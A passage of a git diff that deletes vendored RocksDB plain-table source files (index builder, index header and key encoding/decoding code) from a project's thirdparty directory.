-    sub_index_size_ += entry_count * PlainTableIndex::kOffsetLen;
-  }
-}
-
-Slice PlainTableIndexBuilder::FillIndexes(
-    const std::vector<IndexRecord*>& hash_to_offsets,
-    const std::vector<uint32_t>& entries_per_bucket) {
-  ROCKS_LOG_DEBUG(ioptions_.info_log,
-                  "Reserving %" PRIu32 " bytes for plain table's sub_index",
-                  sub_index_size_);
-  auto total_allocate_size = GetTotalSize();
-  char* allocated = arena_->AllocateAligned(
-      total_allocate_size, huge_page_tlb_size_, ioptions_.info_log);
-
-  auto temp_ptr = EncodeVarint32(allocated, index_size_);
-  uint32_t* index =
-      reinterpret_cast<uint32_t*>(EncodeVarint32(temp_ptr, num_prefixes_));
-  char* sub_index = reinterpret_cast<char*>(index + index_size_);
-
-  uint32_t sub_index_offset = 0;
-  for (uint32_t i = 0; i < index_size_; i++) {
-    uint32_t num_keys_for_bucket = entries_per_bucket[i];
-    switch (num_keys_for_bucket) {
-      case 0:
-        // No key for bucket
-        PutUnaligned(index + i, (uint32_t)PlainTableIndex::kMaxFileSize);
-        break;
-      case 1:
-        // point directly to the file offset
-        PutUnaligned(index + i, hash_to_offsets[i]->offset);
-        break;
-      default:
-        // point to second level indexes.
-        PutUnaligned(index + i, sub_index_offset | PlainTableIndex::kSubIndexMask);
-        char* prev_ptr = &sub_index[sub_index_offset];
-        char* cur_ptr = EncodeVarint32(prev_ptr, num_keys_for_bucket);
-        sub_index_offset += static_cast<uint32_t>(cur_ptr - prev_ptr);
-        char* sub_index_pos = &sub_index[sub_index_offset];
-        IndexRecord* record = hash_to_offsets[i];
-        int j;
-        for (j = num_keys_for_bucket - 1; j >= 0 && record;
-             j--, record = record->next) {
-          EncodeFixed32(sub_index_pos + j * sizeof(uint32_t), record->offset);
-        }
-        assert(j == -1 && record == nullptr);
-        sub_index_offset += PlainTableIndex::kOffsetLen * num_keys_for_bucket;
-        assert(sub_index_offset <= sub_index_size_);
-        break;
-    }
-  }
-  assert(sub_index_offset == sub_index_size_);
-
-  ROCKS_LOG_DEBUG(ioptions_.info_log,
-                  "hash table size: %d, suffix_map length %" ROCKSDB_PRIszt,
-                  index_size_, sub_index_size_);
-  return Slice(allocated, GetTotalSize());
-}
-
-const std::string PlainTableIndexBuilder::kPlainTableIndexBlock =
-    "PlainTableIndexBlock";
-};  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/table/plain_table_index.h b/thirdparty/rocksdb/table/plain_table_index.h
deleted file mode 100644
index 2916be4..0000000
--- a/thirdparty/rocksdb/table/plain_table_index.h
+++ /dev/null
@@ -1,226 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include <string>
-#include <vector>
-
-#include "db/dbformat.h"
-#include "monitoring/histogram.h"
-#include "options/cf_options.h"
-#include "rocksdb/options.h"
-#include "util/arena.h"
-#include "util/hash.h"
-#include "util/murmurhash.h"
-
-namespace rocksdb {
-
-// PlainTableIndex contains buckets size of index_size_, each is a
-// 32-bit integer. The lower 31 bits contain an offset value (explained below)
-// and the first bit of the integer indicates type of the offset.
-//
-// +--------------+------------------------------------------------------+
-// | Flag (1 bit) | Offset to binary search buffer or file (31 bits)     +
-// +--------------+------------------------------------------------------+
-//
-// Explanation for the "flag bit":
-//
-// 0 indicates that the bucket contains only one prefix (no conflict when
-//   hashing this prefix), whose first row starts from this offset of the
-// file.
-// 1 indicates that the bucket contains more than one prefixes, or there
-//   are too many rows for one prefix so we need a binary search for it. In
-//   this case, the offset indicates the offset of sub_index_ holding the
-//   binary search indexes of keys for those rows. Those binary search indexes
-//   are organized in this way:
-//
-// The first 4 bytes, indicate how many indexes (N) are stored after it. After
-// it, there are N 32-bit integers, each points of an offset of the file,
-// which
-// points to starting of a row. Those offsets need to be guaranteed to be in
-// ascending order so the keys they are pointing to are also in ascending
-// order
-// to make sure we can use them to do binary searches. Below is visual
-// presentation of a bucket.
-//
-// <begin>
-//   number_of_records:  varint32
-//   record 1 file offset:  fixedint32
-//   record 2 file offset:  fixedint32
-//    ....
-//   record N file offset:  fixedint32
-// <end>
-class PlainTableIndex {
- public:
-  enum IndexSearchResult {
-    kNoPrefixForBucket = 0,
-    kDirectToFile = 1,
-    kSubindex = 2
-  };
-
-  explicit PlainTableIndex(Slice data) { InitFromRawData(data); }
-
-  PlainTableIndex()
-      : index_size_(0),
-        sub_index_size_(0),
-        num_prefixes_(0),
-        index_(nullptr),
-        sub_index_(nullptr) {}
-
-  IndexSearchResult GetOffset(uint32_t prefix_hash,
-                              uint32_t* bucket_value) const;
-
-  Status InitFromRawData(Slice data);
-
-  const char* GetSubIndexBasePtrAndUpperBound(uint32_t offset,
-                                              uint32_t* upper_bound) const {
-    const char* index_ptr = &sub_index_[offset];
-    return GetVarint32Ptr(index_ptr, index_ptr + 4, upper_bound);
-  }
-
-  uint32_t GetIndexSize() const { return index_size_; }
-
-  uint32_t GetSubIndexSize() const { return sub_index_size_; }
-
-  uint32_t GetNumPrefixes() const { return num_prefixes_; }
-
-  static const uint64_t kMaxFileSize = (1u << 31) - 1;
-  static const uint32_t kSubIndexMask = 0x80000000;
-  static const size_t kOffsetLen = sizeof(uint32_t);
-
- private:
-  uint32_t index_size_;
-  uint32_t sub_index_size_;
-  uint32_t num_prefixes_;
-
-  uint32_t* index_;
-  char* sub_index_;
-};
-
-// PlainTableIndexBuilder is used to create plain table index.
-// After calling Finish(), it returns Slice, which is usually
-// used either to initialize PlainTableIndex or
-// to save index to sst file.
-// For more details about the  index, please refer to:
-// https://github.com/facebook/rocksdb/wiki/PlainTable-Format
-// #wiki-in-memory-index-format
-class PlainTableIndexBuilder {
- public:
-  PlainTableIndexBuilder(Arena* arena, const ImmutableCFOptions& ioptions,
-                         size_t index_sparseness, double hash_table_ratio,
-                         size_t huge_page_tlb_size)
-      : arena_(arena),
-        ioptions_(ioptions),
-        record_list_(kRecordsPerGroup),
-        is_first_record_(true),
-        due_index_(false),
-        num_prefixes_(0),
-        num_keys_per_prefix_(0),
-        prev_key_prefix_hash_(0),
-        index_sparseness_(index_sparseness),
-        prefix_extractor_(ioptions.prefix_extractor),
-        hash_table_ratio_(hash_table_ratio),
-        huge_page_tlb_size_(huge_page_tlb_size) {}
-
-  void AddKeyPrefix(Slice key_prefix_slice, uint32_t key_offset);
-
-  Slice Finish();
-
-  uint32_t GetTotalSize() const {
-    return VarintLength(index_size_) + VarintLength(num_prefixes_) +
-           PlainTableIndex::kOffsetLen * index_size_ + sub_index_size_;
-  }
-
-  static const std::string kPlainTableIndexBlock;
-
- private:
-  struct IndexRecord {
-    uint32_t hash;    // hash of the prefix
-    uint32_t offset;  // offset of a row
-    IndexRecord* next;
-  };
-
-  // Helper class to track all the index records
-  class IndexRecordList {
-   public:
-    explicit IndexRecordList(size_t num_records_per_group)
-        : kNumRecordsPerGroup(num_records_per_group),
-          current_group_(nullptr),
-          num_records_in_current_group_(num_records_per_group) {}
-
-    ~IndexRecordList() {
-      for (size_t i = 0; i < groups_.size(); i++) {
-        delete[] groups_[i];
-      }
-    }
-
-    void AddRecord(uint32_t hash, uint32_t offset);
-
-    size_t GetNumRecords() const {
-      return (groups_.size() - 1) * kNumRecordsPerGroup +
-             num_records_in_current_group_;
-    }
-    IndexRecord* At(size_t index) {
-      return &(groups_[index / kNumRecordsPerGroup]
-                      [index % kNumRecordsPerGroup]);
-    }
-
-   private:
-    IndexRecord* AllocateNewGroup() {
-      IndexRecord* result = new IndexRecord[kNumRecordsPerGroup];
-      groups_.push_back(result);
-      return result;
-    }
-
-    // Each group in `groups_` contains fix-sized records (determined by
-    // kNumRecordsPerGroup). Which can help us minimize the cost if resizing
-    // occurs.
-    const size_t kNumRecordsPerGroup;
-    IndexRecord* current_group_;
-    // List of arrays allocated
-    std::vector<IndexRecord*> groups_;
-    size_t num_records_in_current_group_;
-  };
-
-  void AllocateIndex();
-
-  // Internal helper function to bucket index record list to hash buckets.
-  void BucketizeIndexes(std::vector<IndexRecord*>* hash_to_offsets,
-                        std::vector<uint32_t>* entries_per_bucket);
-
-  // Internal helper class to fill the indexes and bloom filters to internal
-  // data structures.
-  Slice FillIndexes(const std::vector<IndexRecord*>& hash_to_offsets,
-                    const std::vector<uint32_t>& entries_per_bucket);
-
-  Arena* arena_;
-  const ImmutableCFOptions ioptions_;
-  HistogramImpl keys_per_prefix_hist_;
-  IndexRecordList record_list_;
-  bool is_first_record_;
-  bool due_index_;
-  uint32_t num_prefixes_;
-  uint32_t num_keys_per_prefix_;
-
-  uint32_t prev_key_prefix_hash_;
-  size_t index_sparseness_;
-  uint32_t index_size_;
-  uint32_t sub_index_size_;
-
-  const SliceTransform* prefix_extractor_;
-  double hash_table_ratio_;
-  size_t huge_page_tlb_size_;
-
-  std::string prev_key_prefix_;
-
-  static const size_t kRecordsPerGroup = 256;
-};
-
-};  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/table/plain_table_key_coding.cc b/thirdparty/rocksdb/table/plain_table_key_coding.cc
deleted file mode 100644
index 3e87c03..0000000
--- a/thirdparty/rocksdb/table/plain_table_key_coding.cc
+++ /dev/null
@@ -1,498 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-#include "table/plain_table_key_coding.h"
-
-#include <algorithm>
-#include <string>
-#include "db/dbformat.h"
-#include "table/plain_table_reader.h"
-#include "table/plain_table_factory.h"
-#include "util/file_reader_writer.h"
-
-namespace rocksdb {
-
-enum PlainTableEntryType : unsigned char {
-  kFullKey = 0,
-  kPrefixFromPreviousKey = 1,
-  kKeySuffix = 2,
-};
-
-namespace {
-
-// Control byte:
-// First two bits indicate type of entry
-// Other bytes are inlined sizes. If all bits are 1 (0x03F), overflow bytes
-// are used. key_size-0x3F will be encoded as a variint32 after this bytes.
-
-const unsigned char kSizeInlineLimit = 0x3F;
-
-// Return 0 for error
-size_t EncodeSize(PlainTableEntryType type, uint32_t key_size,
-                  char* out_buffer) {
-  out_buffer[0] = type << 6;
-
-  if (key_size < static_cast<uint32_t>(kSizeInlineLimit)) {
-    // size inlined
-    out_buffer[0] |= static_cast<char>(key_size);
-    return 1;
-  } else {
-    out_buffer[0] |= kSizeInlineLimit;
-    char* ptr = EncodeVarint32(out_buffer + 1, key_size - kSizeInlineLimit);
-    return ptr - out_buffer;
-  }
-}
-}  // namespace
-
-// Fill bytes_read with number of bytes read.
-inline Status PlainTableKeyDecoder::DecodeSize(uint32_t start_offset,
-                                               PlainTableEntryType* entry_type,
-                                               uint32_t* key_size,
-                                               uint32_t* bytes_read) {
-  Slice next_byte_slice;
-  bool success = file_reader_.Read(start_offset, 1, &next_byte_slice);
-  if (!success) {
-    return file_reader_.status();
-  }
-  *entry_type = static_cast<PlainTableEntryType>(
-      (static_cast<unsigned char>(next_byte_slice[0]) & ~kSizeInlineLimit) >>
-      6);
-  char inline_key_size = next_byte_slice[0] & kSizeInlineLimit;
-  if (inline_key_size < kSizeInlineLimit) {
-    *key_size = inline_key_size;
-    *bytes_read = 1;
-    return Status::OK();
-  } else {
-    uint32_t extra_size;
-    uint32_t tmp_bytes_read;
-    success = file_reader_.ReadVarint32(start_offset + 1, &extra_size,
-                                        &tmp_bytes_read);
-    if (!success) {
-      return file_reader_.status();
-    }
-    assert(tmp_bytes_read > 0);
-    *key_size = kSizeInlineLimit + extra_size;
-    *bytes_read = tmp_bytes_read + 1;
-    return Status::OK();
-  }
-}
-
-Status PlainTableKeyEncoder::AppendKey(const Slice& key,
-                                       WritableFileWriter* file,
-                                       uint64_t* offset, char* meta_bytes_buf,
-                                       size_t* meta_bytes_buf_size) {
-  ParsedInternalKey parsed_key;
-  if (!ParseInternalKey(key, &parsed_key)) {
-    return Status::Corruption(Slice());
-  }
-
-  Slice key_to_write = key;  // Portion of internal key to write out.
-
-  uint32_t user_key_size = static_cast<uint32_t>(key.size() - 8);
-  if (encoding_type_ == kPlain) {
-    if (fixed_user_key_len_ == kPlainTableVariableLength) {
-      // Write key length
-      char key_size_buf[5];  // tmp buffer for key size as varint32
-      char* ptr = EncodeVarint32(key_size_buf, user_key_size);
-      assert(ptr <= key_size_buf + sizeof(key_size_buf));
-      auto len = ptr - key_size_buf;
-      Status s = file->Append(Slice(key_size_buf, len));
-      if (!s.ok()) {
-        return s;
-      }
-      *offset += len;
-    }
-  } else {
-    assert(encoding_type_ == kPrefix);
-    char size_bytes[12];
-    size_t size_bytes_pos = 0;
-
-    Slice prefix =
-        prefix_extractor_->Transform(Slice(key.data(), user_key_size));
-    if (key_count_for_prefix_ == 0 || prefix != pre_prefix_.GetUserKey() ||
-        key_count_for_prefix_ % index_sparseness_ == 0) {
-      key_count_for_prefix_ = 1;
-      pre_prefix_.SetUserKey(prefix);
-      size_bytes_pos += EncodeSize(kFullKey, user_key_size, size_bytes);
-      Status s = file->Append(Slice(size_bytes, size_bytes_pos));
-      if (!s.ok()) {
-        return s;
-      }
-      *offset += size_bytes_pos;
-    } else {
-      key_count_for_prefix_++;
-      if (key_count_for_prefix_ == 2) {
-        // For second key within a prefix, need to encode prefix length
-        size_bytes_pos +=
-            EncodeSize(kPrefixFromPreviousKey,
-                       static_cast<uint32_t>(pre_prefix_.GetUserKey().size()),
-                       size_bytes + size_bytes_pos);
-      }
-      uint32_t prefix_len =
-          static_cast<uint32_t>(pre_prefix_.GetUserKey().size());
-      size_bytes_pos += EncodeSize(kKeySuffix, user_key_size - prefix_len,
-                                   size_bytes + size_bytes_pos);
-      Status s = file->Append(Slice(size_bytes, size_bytes_pos));
-      if (!s.ok()) {
-        return s;
-      }
-      *offset += size_bytes_pos;
-      key_to_write = Slice(key.data() + prefix_len, key.size() - prefix_len);
-    }
-  }
-
-  // Encode full key
-  // For value size as varint32 (up to 5 bytes).
-  // If the row is of value type with seqId 0, flush the special flag together
-  // in this buffer to safe one file append call, which takes 1 byte.
-  if (parsed_key.sequence == 0 && parsed_key.type == kTypeValue) {
-    Status s =
-        file->Append(Slice(key_to_write.data(), key_to_write.size() - 8));
-    if (!s.ok()) {
-      return s;
-    }
-    *offset += key_to_write.size() - 8;
-    meta_bytes_buf[*meta_bytes_buf_size] = PlainTableFactory::kValueTypeSeqId0;
-    *meta_bytes_buf_size += 1;
-  } else {
-    file->Append(key_to_write);
-    *offset += key_to_write.size();
-  }
-
-  return Status::OK();
-}
-
-Slice PlainTableFileReader::GetFromBuffer(Buffer* buffer, uint32_t file_offset,
-                                          uint32_t len) {
-  assert(file_offset + len <= file_info_->data_end_offset);
-  return Slice(buffer->buf.get() + (file_offset - buffer->buf_start_offset),
-               len);
-}
-
-bool PlainTableFileReader::ReadNonMmap(uint32_t file_offset, uint32_t len,
-                                       Slice* out) {
-  const uint32_t kPrefetchSize = 256u;
-
-  // Try to read from buffers.
-  for (uint32_t i = 0; i < num_buf_; i++) {
-    Buffer* buffer = buffers_[num_buf_ - 1 - i].get();
-    if (file_offset >= buffer->buf_start_offset &&
-        file_offset + len <= buffer->buf_start_offset + buffer->buf_len) {
-      *out = GetFromBuffer(buffer, file_offset, len);
-      return true;
-    }
-  }
-
-  Buffer* new_buffer;
-  // Data needed is not in any of the buffer. Allocate a new buffer.
-  if (num_buf_ < buffers_.size()) {
-    // Add a new buffer
-    new_buffer = new Buffer();
-    buffers_[num_buf_++].reset(new_buffer);
-  } else {
-    // Now simply replace the last buffer. Can improve the placement policy
-    // if needed.
-    new_buffer = buffers_[num_buf_ - 1].get();
-  }
-
-  assert(file_offset + len <= file_info_->data_end_offset);
-  uint32_t size_to_read = std::min(file_info_->data_end_offset - file_offset,
-                                   std::max(kPrefetchSize, len));
-  if (size_to_read > new_buffer->buf_capacity) {
-    new_buffer->buf.reset(new char[size_to_read]);
-    new_buffer->buf_capacity = size_to_read;
-    new_buffer->buf_len = 0;
-  }
-  Slice read_result;
-  Status s = file_info_->file->Read(file_offset, size_to_read, &read_result,
-                                    new_buffer->buf.get());
-  if (!s.ok()) {
-    status_ = s;
-    return false;
-  }
-  new_buffer->buf_start_offset = file_offset;
-  new_buffer->buf_len = size_to_read;
-  *out = GetFromBuffer(new_buffer, file_offset, len);
-  return true;
-}
-
-inline bool PlainTableFileReader::ReadVarint32(uint32_t offset, uint32_t* out,
-                                               uint32_t* bytes_read) {
-  if (file_info_->is_mmap_mode) {
-    const char* start = file_info_->file_data.data() + offset;
-    const char* limit =
-        file_info_->file_data.data() + file_info_->data_end_offset;
-    const char* key_ptr = GetVarint32Ptr(start, limit, out);
-    assert(key_ptr != nullptr);
-    *bytes_read = static_cast<uint32_t>(key_ptr - start);
-    return true;
-  } else {
-    return ReadVarint32NonMmap(offset, out, bytes_read);
-  }
-}
-
-bool PlainTableFileReader::ReadVarint32NonMmap(uint32_t offset, uint32_t* out,
-                                               uint32_t* bytes_read) {
-  const char* start;
-  const char* limit;
-  const uint32_t kMaxVarInt32Size = 6u;
-  uint32_t bytes_to_read =
-      std::min(file_info_->data_end_offset - offset, kMaxVarInt32Size);
-  Slice bytes;
-  if (!Read(offset, bytes_to_read, &bytes)) {
-    return false;
-  }
-  start = bytes.data();
-  limit = bytes.data() + bytes.size();
-
-  const char* key_ptr = GetVarint32Ptr(start, limit, out);
-  *bytes_read =
-      (key_ptr != nullptr) ? static_cast<uint32_t>(key_ptr - start) : 0;
-  return true;
-}
-
-Status PlainTableKeyDecoder::ReadInternalKey(
-    uint32_t file_offset, uint32_t user_key_size, ParsedInternalKey* parsed_key,
-    uint32_t* bytes_read, bool* internal_key_valid, Slice* internal_key) {
-  Slice tmp_slice;
-  bool success = file_reader_.Read(file_offset, user_key_size + 1, &tmp_slice);
-  if (!success) {
-    return file_reader_.status();
-  }
-  if (tmp_slice[user_key_size] == PlainTableFactory::kValueTypeSeqId0) {
-    // Special encoding for the row with seqID=0
-    parsed_key->user_key = Slice(tmp_slice.data(), user_key_size);
-    parsed_key->sequence = 0;
-    parsed_key->type = kTypeValue;
-    *bytes_read += user_key_size + 1;
-    *internal_key_valid = false;
-  } else {
-    success = file_reader_.Read(file_offset, user_key_size + 8, internal_key);
-    if (!success) {
-      return file_reader_.status();
-    }
-    *internal_key_valid = true;
-    if (!ParseInternalKey(*internal_key, parsed_key)) {
-      return Status::Corruption(
-          Slice("Incorrect value type found when reading the next key"));
-    }
-    *bytes_read += user_key_size + 8;
-  }
-  return Status::OK();
-}
-
-Status PlainTableKeyDecoder::NextPlainEncodingKey(uint32_t start_offset,
-                                                  ParsedInternalKey* parsed_key,
-                                                  Slice* internal_key,
-                                                  uint32_t* bytes_read,
-                                                  bool* seekable) {
-  uint32_t user_key_size = 0;
-  Status s;
-  if (fixed_user_key_len_ != kPlainTableVariableLength) {
-    user_key_size = fixed_user_key_len_;
-  } else {
-    uint32_t tmp_size = 0;
-    uint32_t tmp_read;
-    bool success =
-        file_reader_.ReadVarint32(start_offset, &tmp_size, &tmp_read);
-    if (!success) {
-      return file_reader_.status();
-    }
-    assert(tmp_read > 0);
-    user_key_size = tmp_size;
-    *bytes_read = tmp_read;
-  }
-  // dummy initial value to avoid compiler complain
-  bool decoded_internal_key_valid = true;
-  Slice decoded_internal_key;
-  s = ReadInternalKey(start_offset + *bytes_read, user_key_size, parsed_key,
-                      bytes_read, &decoded_internal_key_valid,
-                      &decoded_internal_key);
-  if (!s.ok()) {
-    return s;
-  }
-  if (!file_reader_.file_info()->is_mmap_mode) {
-    cur_key_.SetInternalKey(*parsed_key);
-    parsed_key->user_key =
-        Slice(cur_key_.GetInternalKey().data(), user_key_size);
-    if (internal_key != nullptr) {
-      *internal_key = cur_key_.GetInternalKey();
-    }
-  } else if (internal_key != nullptr) {
-    if (decoded_internal_key_valid) {
-      *internal_key = decoded_internal_key;
-    } else {
-      // Need to copy out the internal key
-      cur_key_.SetInternalKey(*parsed_key);
-      *internal_key = cur_key_.GetInternalKey();
-    }
-  }
-  return Status::OK();
-}
-
-Status PlainTableKeyDecoder::NextPrefixEncodingKey(
-    uint32_t start_offset, ParsedInternalKey* parsed_key, Slice* internal_key,
-    uint32_t* bytes_read, bool* seekable) {
-  PlainTableEntryType entry_type;
-
-  bool expect_suffix = false;
-  Status s;
-  do {
-    uint32_t size = 0;
-    // dummy initial value to avoid compiler complain
-    bool decoded_internal_key_valid = true;
-    uint32_t my_bytes_read = 0;
-    s = DecodeSize(start_offset + *bytes_read, &entry_type, &size,
-                   &my_bytes_read);
-    if (!s.ok()) {
-      return s;
-    }
-    if (my_bytes_read == 0) {
-      return Status::Corruption("Unexpected EOF when reading size of the key");
-    }
-    *bytes_read += my_bytes_read;
-
-    switch (entry_type) {
-      case kFullKey: {
-        expect_suffix = false;
-        Slice decoded_internal_key;
-        s = ReadInternalKey(start_offset + *bytes_read, size, parsed_key,
-                            bytes_read, &decoded_internal_key_valid,
-                            &decoded_internal_key);
-        if (!s.ok()) {
-          return s;
-        }
-        if (!file_reader_.file_info()->is_mmap_mode ||
-            (internal_key != nullptr && !decoded_internal_key_valid)) {
-          // In non-mmap mode, always need to make a copy of keys returned to
-          // users, because after reading value for the key, the key might
-          // be invalid.
-          cur_key_.SetInternalKey(*parsed_key);
-          saved_user_key_ = cur_key_.GetUserKey();
-          if (!file_reader_.file_info()->is_mmap_mode) {
-            parsed_key->user_key =
-                Slice(cur_key_.GetInternalKey().data(), size);
-          }
-          if (internal_key != nullptr) {
-            *internal_key = cur_key_.GetInternalKey();
-          }
-        } else {
-          if (internal_key != nullptr) {
-            *internal_key = decoded_internal_key;
-          }
-          saved_user_key_ = parsed_key->user_key;
-        }
-        break;
-      }
-      case kPrefixFromPreviousKey: {
-        if (seekable != nullptr) {
-          *seekable = false;
-        }
-        prefix_len_ = size;
-        assert(prefix_extractor_ == nullptr ||
-               prefix_extractor_->Transform(saved_user_key_).size() ==
-                   prefix_len_);
-        // Need read another size flag for suffix
-        expect_suffix = true;
-        break;
-      }
-      case kKeySuffix: {
-        expect_suffix = false;
-        if (seekable != nullptr) {
-          *seekable = false;
-        }
-
-        Slice tmp_slice;
-        s = ReadInternalKey(start_offset + *bytes_read, size, parsed_key,
-                            bytes_read, &decoded_internal_key_valid,
-                            &tmp_slice);
-        if (!s.ok()) {
-          return s;
-        }
-        if (!file_reader_.file_info()->is_mmap_mode) {
-          // In non-mmap mode, we need to make a copy of keys returned to
-          // users, because after reading value for the key, the key might
-          // be invalid.
-          // saved_user_key_ points to cur_key_. We are making a copy of
-          // the prefix part to another string, and construct the current
-          // key from the prefix part and the suffix part back to cur_key_.
-          std::string tmp =
-              Slice(saved_user_key_.data(), prefix_len_).ToString();
-          cur_key_.Reserve(prefix_len_ + size);
-          cur_key_.SetInternalKey(tmp, *parsed_key);
-          parsed_key->user_key =
-              Slice(cur_key_.GetInternalKey().data(), prefix_len_ + size);
-          saved_user_key_ = cur_key_.GetUserKey();
-        } else {
-          cur_key_.Reserve(prefix_len_ + size);
-          cur_key_.SetInternalKey(Slice(saved_user_key_.data(), prefix_len_),
-                                  *parsed_key);
-        }
-        parsed_key->user_key = cur_key_.GetUserKey();
-        if (internal_key != nullptr) {
-          *internal_key = cur_key_.GetInternalKey();
-        }
-        break;
-      }
-      default:
-        return Status::Corruption("Un-identified size flag.");
-    }
-  } while (expect_suffix);  // Another round if suffix is expected.
-  return Status::OK();
-}
-
-Status PlainTableKeyDecoder::NextKey(uint32_t start_offset,
-                                     ParsedInternalKey* parsed_key,
-                                     Slice* internal_key, Slice* value,
-                                     uint32_t* bytes_read, bool* seekable) {
-  assert(value != nullptr);
-  Status s = NextKeyNoValue(start_offset, parsed_key, internal_key, bytes_read,
-                            seekable);
-  if (s.ok()) {
-    assert(bytes_read != nullptr);
-    uint32_t value_size;
-    uint32_t value_size_bytes;
-    bool success = file_reader_.ReadVarint32(start_offset + *bytes_read,
-                                             &value_size, &value_size_bytes);
-    if (!success) {
-      return file_reader_.status();
-    }
-    if (value_size_bytes == 0) {
-      return Status::Corruption(
-          "Unexpected EOF when reading the next value's size.");
-    }
-    *bytes_read += value_size_bytes;
-    success = file_reader_.Read(start_offset + *bytes_read, value_size, value);
-    if (!success) {
-      return file_reader_.status();
-    }
-    *bytes_read += value_size;
-  }
-  return s;
-}
-
-Status PlainTableKeyDecoder::NextKeyNoValue(uint32_t start_offset,
-                                            ParsedInternalKey* parsed_key,
-                                            Slice* internal_key,
-                                            uint32_t* bytes_read,
-                                            bool* seekable) {
-  *bytes_read = 0;
-  if (seekable != nullptr) {
-    *seekable = true;
-  }
-  Status s;
-  if (encoding_type_ == kPlain) {
-    return NextPlainEncodingKey(start_offset, parsed_key, internal_key,
-                                bytes_read, seekable);
-  } else {
-    assert(encoding_type_ == kPrefix);
-    return NextPrefixEncodingKey(start_offset, parsed_key, internal_key,
-                                 bytes_read, seekable);
-  }
-}
-
-}  // namespace rocksdb
-#endif  // ROCKSDB_LIT
diff --git a/thirdparty/rocksdb/table/plain_table_key_coding.h b/thirdparty/rocksdb/table/plain_table_key_coding.h
deleted file mode 100644
index 321e0ae..0000000
--- a/thirdparty/rocksdb/table/plain_table_key_coding.h
+++ /dev/null
@@ -1,183 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-#ifndef ROCKSDB_LITE
-
-#include <array>
-#include "rocksdb/slice.h"
-#include "db/dbformat.h"
-#include "table/plain_table_reader.h"
-
-namespace rocksdb {
-
-class WritableFile;
-struct ParsedInternalKey;
-struct PlainTableReaderFileInfo;
-enum PlainTableEntryType : unsigned char;
-
-// Helper class to write out a key to an output file
-// Actual data format of the key is documented in plain_table_factory.h
-class PlainTableKeyEncoder {
- public:
-  explicit PlainTableKeyEncoder(EncodingType encoding_type,
-                                uint32_t user_key_len,
-                                const SliceTransform* prefix_extractor,
-                                size_t index_sparseness)
-      : encoding_type_((prefix_extractor != nullptr) ? encoding_type : kPlain),
-        fixed_user_key_len_(user_key_len),
-        prefix_extractor_(prefix_extractor),
-        index_sparseness_((index_sparseness > 1) ? index_sparseness : 1),
-        key_count_for_prefix_(0) {}
-  // key: the key to write out, in the format of internal key.
-  // file: the output file to write out
-  // offset: offset in the file. Needs to be updated after appending bytes
-  //         for the key
-  // meta_bytes_buf: buffer for extra meta bytes
-  // meta_bytes_buf_size: offset to append extra meta bytes. Will be updated
-  //                      if meta_bytes_buf is updated.
-  Status AppendKey(const Slice& key, WritableFileWriter* file, uint64_t* offset,
-                   char* meta_bytes_buf, size_t* meta_bytes_buf_size);
-
-  // Return actual encoding type to be picked
-  EncodingType GetEncodingType() { return encoding_type_; }
-
- private:
-  EncodingType encoding_type_;
-  uint32_t fixed_user_key_len_;
-  const SliceTransform* prefix_extractor_;
-  const size_t index_sparseness_;
-  size_t key_count_for_prefix_;
-  IterKey pre_prefix_;
-};
-
-class PlainTableFileReader {
- public:
-  explicit PlainTableFileReader(const PlainTableReaderFileInfo* _file_info)
-      : file_info_(_file_info), num_buf_(0) {}
-  // In mmaped mode, the results point to mmaped area of the file, which
-  // means it is always valid before closing the file.
-  // In non-mmap mode, the results point to an internal buffer. If the caller
-  // makes another read call, the results may not be valid. So callers should
-  // make a copy when needed.
-  // In order to save read calls to files, we keep two internal buffers:
-  // the first read and the most recent read. This is efficient because it
-  // columns these two common use cases:
-  // (1) hash index only identify one location, we read the key to verify
-  //     the location, and read key and value if it is the right location.
-  // (2) after hash index checking, we identify two locations (because of
-  //     hash bucket conflicts), we binary search the two location to see
-  //     which one is what we need and start to read from the location.
-  // These two most common use cases will be covered by the two buffers
-  // so that we don't need to re-read the same location.
-  // Currently we keep a fixed size buffer. If a read doesn't exactly fit
-  // the buffer, we replace the second buffer with the location user reads.
-  //
-  // If return false, status code is stored in status_.
-  bool Read(uint32_t file_offset, uint32_t len, Slice* out) {
-    if (file_info_->is_mmap_mode) {
-      assert(file_offset + len <= file_info_->data_end_offset);
-      *out = Slice(file_info_->file_data.data() + file_offset, len);
-      return true;
-    } else {
-      return ReadNonMmap(file_offset, len, out);
-    }
-  }
-
-  // If return false, status code is stored in status_.
-  bool ReadNonMmap(uint32_t file_offset, uint32_t len, Slice* output);
-
-  // *bytes_read = 0 means eof. false means failure and status is saved
-  // in status_. Not directly returning Status to save copying status
-  // object to map previous performance of mmap mode.
-  inline bool ReadVarint32(uint32_t offset, uint32_t* output,
-                           uint32_t* bytes_read);
-
-  bool ReadVarint32NonMmap(uint32_t offset, uint32_t* output,
-                           uint32_t* bytes_read);
-
-  Status status() const { return status_; }
-
-  const PlainTableReaderFileInfo* file_info() { return file_info_; }
-
- private:
-  const PlainTableReaderFileInfo* file_info_;
-
-  struct Buffer {
-    Buffer() : buf_start_offset(0), buf_len(0), buf_capacity(0) {}
-    std::unique_ptr<char[]> buf;
-    uint32_t buf_start_offset;
-    uint32_t buf_len;
-    uint32_t buf_capacity;
-  };
-
-  // Keep buffers for two recent reads.
-  std::array<unique_ptr<Buffer>, 2> buffers_;
-  uint32_t num_buf_;
-  Status status_;
-
-  Slice GetFromBuffer(Buffer* buf, uint32_t file_offset, uint32_t len);
-};
-
-// A helper class to decode keys from input buffer
-// Actual data format of the key is documented in plain_table_factory.h
-class PlainTableKeyDecoder {
- public:
-  explicit PlainTableKeyDecoder(const PlainTableReaderFileInfo* file_info,
